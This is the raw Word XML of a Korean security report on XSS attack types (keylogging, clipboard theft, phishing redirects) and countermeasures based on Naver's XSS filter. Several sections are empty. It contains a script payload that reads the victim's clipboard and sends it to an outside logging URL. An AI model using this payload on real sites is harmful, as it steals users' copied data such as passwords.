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5227E" w14:textId="77777777" w:rsidR="003F170A" w:rsidRPr="005904AE" w:rsidRDefault="003F170A" w:rsidP="003F170A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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>공격</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61690FB1" w14:textId="77777777" w:rsidR="003F170A" w:rsidRDefault="003F170A" w:rsidP="003F170A">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>개요</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168BE3ED" w14:textId="77777777" w:rsidR="003F170A" w:rsidRDefault="003F170A" w:rsidP="003F170A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS 공격은 주로 사용자의 인증정보를 가로채 공격자가 인증을 우회하기 위한 목적으로 활용되며 주로 </w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 출력하는 테스트 구문으로 취약점 여부를 테스트한다. 이 때문에</w:t>
      </w:r>
      <w:r w:rsidR="00182BCA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00182BCA">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00182BCA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00182BCA">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00182BCA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">를 통한 인증정보 노출 방지를 목표로 하여 XSS을 활용한 다양한 공격 방식을 대비하지 못하는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>두</w:t>
      </w:r>
      <w:r w:rsidR="00182BCA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>는 경우가 있다. 이에 XSS를 활용한 다른 유형의 공격을 알아보고자 한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB3C0C9" w14:textId="77777777" w:rsidR="00182BCA" w:rsidRDefault="00182BCA" w:rsidP="003F170A"/>
    <w:p w14:paraId="7DF78FA5" w14:textId="77777777" w:rsidR="003F170A" w:rsidRDefault="00182BCA" w:rsidP="00182BCA">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>공격</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4EA8BA" w14:textId="77777777" w:rsidR="00182BCA" w:rsidRPr="00182BCA" w:rsidRDefault="00182BCA" w:rsidP="00182BCA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>스크립트 구문 삽입을 이용해서 다른 사용자에게 피해를 입힐 수 있는 다양한 방법을 알아본다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAB9DBE" w14:textId="77777777" w:rsidR="00182BCA" w:rsidRDefault="00182BCA" w:rsidP="00182BCA"/>
    <w:p w14:paraId="6BCF6860" w14:textId="77777777" w:rsidR="00182BCA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입력 값 탈취</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE40983" w14:textId="77777777" w:rsidR="00182BCA" w:rsidRDefault="00010531" w:rsidP="00182BCA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">키보드 입력 값을 가로채 기록하는 행위를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>(Keylogging)이라 한다. 다음은 짧은 스크립트 코드를 삽입하여 사용자의 입력 값을 가로채는 공격의 예시이다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4DA9F3" w14:textId="39266E03" w:rsidR="00010531" w:rsidRDefault="00496245" w:rsidP="00496245">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로그인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684E4C" w14:paraId="00D26F9E" w14:textId="77777777" w:rsidTr="00D16879">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10664" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="623405E1" w14:textId="53B80B3E" w:rsidR="00684E4C" w:rsidRDefault="00684E4C" w:rsidP="00D16879">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00684E4C" w14:paraId="25275747" w14:textId="77777777" w:rsidTr="00D16879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410C2F0" w14:textId="77777777" w:rsidR="00684E4C" w:rsidRPr="009C2CA8" w:rsidRDefault="00684E4C" w:rsidP="00D16879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3213300E" w14:textId="39B79ABD" w:rsidR="00684E4C" w:rsidRDefault="00684E4C" w:rsidP="00D16879"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="125731D9" w14:textId="77777777" w:rsidR="00496245" w:rsidRDefault="00496245" w:rsidP="00496245">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AC44703" w14:textId="77777777" w:rsidR="002C1CD1" w:rsidRDefault="002C1CD1" w:rsidP="002C1CD1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2C1CD1" w14:paraId="7F400EFD" w14:textId="77777777" w:rsidTr="007164AF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10664" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="36E5165B" w14:textId="77777777" w:rsidR="002C1CD1" w:rsidRDefault="002C1CD1" w:rsidP="007164AF">
            <w:r>
              <w:t>&lt;script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D9779DA" w14:textId="79D4668A" w:rsidR="002C1CD1" w:rsidRDefault="002C1CD1" w:rsidP="007164AF"/>
          <w:p w14:paraId="072A5D0A" w14:textId="77777777" w:rsidR="002C1CD1" w:rsidRDefault="002C1CD1" w:rsidP="007164AF">
            <w:r>
              <w:t>&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1CD1" w14:paraId="2995FB3F" w14:textId="77777777" w:rsidTr="007164AF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14:paraId="578BEF41" w14:textId="77777777" w:rsidR="002C1CD1" w:rsidRPr="00684E4C" w:rsidRDefault="002C1CD1" w:rsidP="007164AF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2E66674F" w14:textId="77777777" w:rsidR="002C1CD1" w:rsidRDefault="002C1CD1" w:rsidP="007164AF"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="21E14943" w14:textId="77777777" w:rsidR="002C1CD1" w:rsidRDefault="002C1CD1" w:rsidP="00496245"/>
    <w:p w14:paraId="3620139F" w14:textId="7C59AA08" w:rsidR="00496245" w:rsidRDefault="00496245" w:rsidP="00496245">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">비 인가 상태에서 사이트 이용 중 인증이 필요한 로그인 페이지로 사용자를 이동시켜 로그인 완료 후, 다시 이용 중이던 페이지로 이동시켜주는 방식의 </w:t>
      </w:r>
      <w:r w:rsidR="008C3A40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">서비스들을 많이 볼 수 있다. </w:t>
      </w:r>
      <w:r w:rsidR="00B813AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">이때 로그인 후 이동할 페이지 값을 페이지에 확인없이 포함하여 </w:t>
      </w:r>
      <w:r w:rsidR="00B813AF">
        <w:t xml:space="preserve">Reflected XSS </w:t>
      </w:r>
      <w:r w:rsidR="00B813AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>취약점이 발생한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E78D393" w14:textId="77777777" w:rsidR="00B813AF" w:rsidRDefault="00B813AF" w:rsidP="00496245"/>
    <w:p w14:paraId="16DCEA06" w14:textId="77777777" w:rsidR="00B813AF" w:rsidRPr="00B813AF" w:rsidRDefault="00B813AF" w:rsidP="00496245"/>
    <w:p w14:paraId="5E82D41C" w14:textId="77777777" w:rsidR="00E81139" w:rsidRDefault="00E81139" w:rsidP="00182BCA"/>
    <w:p w14:paraId="077DB46F" w14:textId="77777777"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lastRenderedPageBreak/>
        <w:t>클립보드 값 탈취</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7FC20A" w14:textId="77777777" w:rsidR="00010531" w:rsidRDefault="00010531" w:rsidP="00010531"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공격과 유사하지만 클립보드에 존재하는 값을 가로챈다는 차이점이 있다. 다음은 클립보드 값을 가로채는 공격의 예시이다. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C43F0EB" w14:textId="77777777" w:rsidR="00010531" w:rsidRDefault="009E0257" w:rsidP="009C2CA8">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>클립보드 복사</w:t>
      </w:r>
      <w:r w:rsidR="009C2CA8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">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9C2CA8" w14:paraId="4227BA5B" w14:textId="77777777" w:rsidTr="009C2CA8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10664" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="657E47CD" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;!DOCTYPE html&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38957AE9" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="599904A6" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;head&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E54437F" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>euc-kr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>" /&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61AE4E41" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;title&gt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>중요테이터를</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 복사하세요&lt;/title&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76FCFBC3" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;script src="https://cdn.jsdelivr.net/clipboard.js/1.5.3/clipboard.min.js"&gt;&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6253541C" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="80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code.jquery.com/jquery-3.1.1.min.js"&gt;&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31CEA225" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;/head&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F2F3577" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3122EFC5" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>window.onload</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = function(){</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="245534BB" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    $(document).ready(function(){</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73D4AD71" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="80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lipboard = new Clipboard('.clipboard');</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="410EBB24" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    });</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D2E2DEA" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:r>
              <w:t>};</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FA4620C" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0052198A" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68AA78EE" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>일련번호</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> : &lt;input type = "text" id = "copy" value="8282"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EEE2C55" w14:textId="77777777" w:rsidR="009C2CA8" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;button class="clipboard" data-clipboard-target="#copy"&gt; 복사 &lt;/button&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C2CA8" w14:paraId="69EC9475" w14:textId="77777777" w:rsidTr="00684E4C">
        <w:trPr>
          <w:trHeight w:val="3798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9250A1B" w14:textId="77777777" w:rsidR="009C2CA8" w:rsidRPr="009C2CA8" w:rsidRDefault="009C2CA8" w:rsidP="00070285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6D016780" w14:textId="77777777" w:rsidR="009C2CA8" w:rsidRDefault="00070285" w:rsidP="009C2CA8">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="163697A1" wp14:editId="4763C511">
                  <wp:extent cx="5280212" cy="233082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62"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5279367" cy="23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82931" w14:textId="77777777" w:rsidR="009C2CA8" w:rsidRDefault="009C2CA8" w:rsidP="009C2CA8"/>
    <w:p w14:paraId="38210ABA" w14:textId="77777777" w:rsidR="00070285" w:rsidRPr="00EE7333" w:rsidRDefault="00070285" w:rsidP="009C2CA8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">위와 같이 데이터를 클립보드에 저장하는 기능을 제공하는 사이트가 있다면, 사이트 이용 시 사용자와 관련된 정보가 클립보드에 저장되어 있을 가능성이 높다. </w:t>
      </w:r>
      <w:r w:rsidR="00EE7333">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">그 밖에도 </w:t>
      </w:r>
      <w:r w:rsidR="00EE7333">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00EE7333">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00EE7333">
        <w:t>Password”</w:t>
      </w:r>
      <w:r w:rsidR="00EE7333">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>와 같은 패스워드 관리 프로그램을 사용하는 사용자들은 패스워드가 클립보드에 저장되어 있어 주의가 필요하다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A557D0" w14:textId="77777777" w:rsidR="00096F6F" w:rsidRDefault="00096F6F" w:rsidP="009C2C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096F6F" w14:paraId="3095AC95" w14:textId="77777777" w:rsidTr="00065417">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10664" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="7026A305" w14:textId="77777777" w:rsidR="0002704B" w:rsidRDefault="0002704B" w:rsidP="0002704B">
            <w:r>
              <w:t>&lt;script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1548FC91" w14:textId="77777777" w:rsidR="0002704B" w:rsidRDefault="0002704B" w:rsidP="0002704B">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>new Image().</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>src</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = 'http://springs-thursday.iptime.org/st-apps/logging/loggin.php?c=' + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>window.clipboardData.getData</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>('Text');</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C0E02FF" w14:textId="77777777" w:rsidR="00096F6F" w:rsidRDefault="0002704B" w:rsidP="0002704B">
            <w:r>
              <w:t>&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00096F6F" w14:paraId="45E67F3B" w14:textId="77777777" w:rsidTr="00684E4C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14:paraId="790A8F97" w14:textId="0CB8B17A" w:rsidR="00096F6F" w:rsidRPr="00684E4C" w:rsidRDefault="00684E4C" w:rsidP="00684E4C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lastRenderedPageBreak/>
              <w:t>실행결과</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9563" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25338E4A" w14:textId="77777777" w:rsidR="00096F6F" w:rsidRDefault="00096F6F" w:rsidP="009C2CA8"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="36ABC5D0" w14:textId="77777777" w:rsidR="00096F6F" w:rsidRPr="009C2CA8" w:rsidRDefault="00096F6F" w:rsidP="009C2CA8"/>
    <w:p w14:paraId="76D08C0F" w14:textId="77777777"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피싱 사이트로 이동</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399A10F0" w14:textId="77777777" w:rsidR="00010531" w:rsidRDefault="00010531" w:rsidP="00010531">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>미리 구성한 피싱 사이트로 사용자를 이동시켜 사용자의 아이디, 패스워드를 가로채는 공격의 예시이다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668899D5" w14:textId="77777777" w:rsidR="00010531" w:rsidRDefault="00010531" w:rsidP="00010531"/>
    <w:p w14:paraId="218267A2" w14:textId="77777777" w:rsidR="008D2128" w:rsidRDefault="008D2128" w:rsidP="008D2128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HTML 태그를 이용한 스크립트 실행</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CE70DE" w14:textId="77777777" w:rsidR="005C1003" w:rsidRDefault="005C1003" w:rsidP="005C1003"/>
    <w:p w14:paraId="64CCC545" w14:textId="77777777" w:rsidR="005C1003" w:rsidRPr="005C1003" w:rsidRDefault="005C1003" w:rsidP="005C1003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DDoS 공격</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB8D2FE" w14:textId="77777777" w:rsidR="008D2128" w:rsidRDefault="008D2128" w:rsidP="008D2128">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23278081" w14:textId="0E89E648" w:rsidR="002C1CD1" w:rsidRDefault="002C1CD1" w:rsidP="002C1CD1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r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTML Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1C0F75" w14:textId="77777777" w:rsidR="002C1CD1" w:rsidRPr="002C1CD1" w:rsidRDefault="002C1CD1" w:rsidP="002C1CD1"/>
    <w:p w14:paraId="33831578" w14:textId="77777777" w:rsidR="00010531" w:rsidRDefault="00010531" w:rsidP="00010531">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>결론</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DB631A" w14:textId="77777777" w:rsidR="00010531" w:rsidRDefault="00010531" w:rsidP="00010531">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS 취약점은 </w:t>
      </w:r>
      <w:r w:rsidR="008D2128">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>사용자의 입력 값을 제대로 검증하지 않아 삽입된 스크립트 구문이 동작하는 것이 근본적인 원인이다. 특정 구문 기반 확인 방식은 취약점을 해결할 수 없다. 스크립트 구문이나 HTML 태그의 입력과 동작을 막는 것에 목표를 두고 지속적인 보안이 필요하다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252134D3" w14:textId="77777777" w:rsidR="00B625F3" w:rsidRPr="00010531" w:rsidRDefault="00B625F3" w:rsidP="00010531"/>
    <w:p w14:paraId="6975B35C" w14:textId="77777777"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14:paraId="636EC53C" w14:textId="77777777" w:rsidR="00431F07" w:rsidRPr="00431F07" w:rsidRDefault="00431F07" w:rsidP="00431F07">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B916F75" w14:textId="77777777"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14:paraId="056D9B1F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</w:t>
      </w:r>
      <w:r w:rsidR="003F170A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>네이버의 XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00431F07">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> 필터를 </w:t>
      </w:r>
      <w:r w:rsidR="003F170A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>참고</w:t>
      </w:r>
      <w:r w:rsidRPr="00431F07">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">하여 </w:t>
      </w:r>
      <w:r w:rsidR="003F170A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">상세한 </w:t>
      </w:r>
      <w:r w:rsidRPr="00431F07">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>대응방안을 자세히 알아보고자 한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E4AFE7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14:paraId="583D213C" w14:textId="77777777"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14:paraId="3C30DF5A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14:paraId="39F55065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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1319FE39" w14:textId="77777777"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14:paraId="673A87C7" w14:textId="77777777" w:rsidR="00431F07" w:rsidRDefault="00431F07" w:rsidP="00431F07">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLineChars="0"/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9476"/>
      </w:tblGrid>
      <w:tr w:rsidR="00431F07" w14:paraId="0DBD6911" w14:textId="77777777" w:rsidTr="005904AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10682" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="4B77CA8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4DA1E38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56A2924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35D183C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41B9640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003F284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import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org.apache.commons.lang3.*;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11F7F293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7021A44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public class main {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55A82CD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2FCBFEB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14:paraId="3FF722B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14:paraId="06FCCDA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2B6B735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54339B8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14:paraId="5AE17CB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177AD5B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14:paraId="5E66C29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14:paraId="27453D7B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14:paraId="26546ADB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0F941EDD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14:paraId="4070CCD1" w14:textId="77777777"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14:paraId="426E412C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1AC70742" w14:textId="77777777"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14:paraId="606E336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14:paraId="7EB6309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E72B93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023955C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6C9C1CA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14:paraId="3C04852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14:paraId="1474AFB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5B84C53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14:paraId="0F8E6D0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14:paraId="65F97929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EAA0F0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4D0E95E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14:paraId="439947A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6A5FE81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7C57297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14:paraId="36DFCBF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14:paraId="42A1CDF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5467CF9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2D933FD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050554E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3897F3EC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387566D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14:paraId="0AF66813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14:paraId="2A0355F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5D053C3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14:paraId="2CE319BD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14:paraId="1F5F3DC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3D0E3A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1FB9CBD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14:paraId="35CDD8F6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350937C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3DAC872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14:paraId="1ECAE606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14:paraId="68E746C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0B921409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7E17606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61DA460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14:paraId="37D8E97B" w14:textId="77777777" w:rsidTr="00684E4C">
        <w:trPr>
          <w:trHeight w:val="1374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6746195" w14:textId="77777777" w:rsidR="005904AE" w:rsidRPr="005904AE" w:rsidRDefault="005904AE" w:rsidP="005904A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476" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="29D051A5" w14:textId="77777777"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C0540" wp14:editId="6BB24D8D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1D28D" w14:textId="77777777" w:rsidR="00A62BE3" w:rsidRPr="00A62BE3" w:rsidRDefault="005904AE" w:rsidP="00431F07">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi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14:paraId="6A772DE8" w14:textId="77777777" w:rsidR="00A62BE3" w:rsidRDefault="00A62BE3" w:rsidP="00A62BE3">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>문제점</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79291071" w14:textId="77777777"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>예외적으로 태그의 사용이 필요한 게시판과 같은 어플리케이션</w:t>
      </w:r>
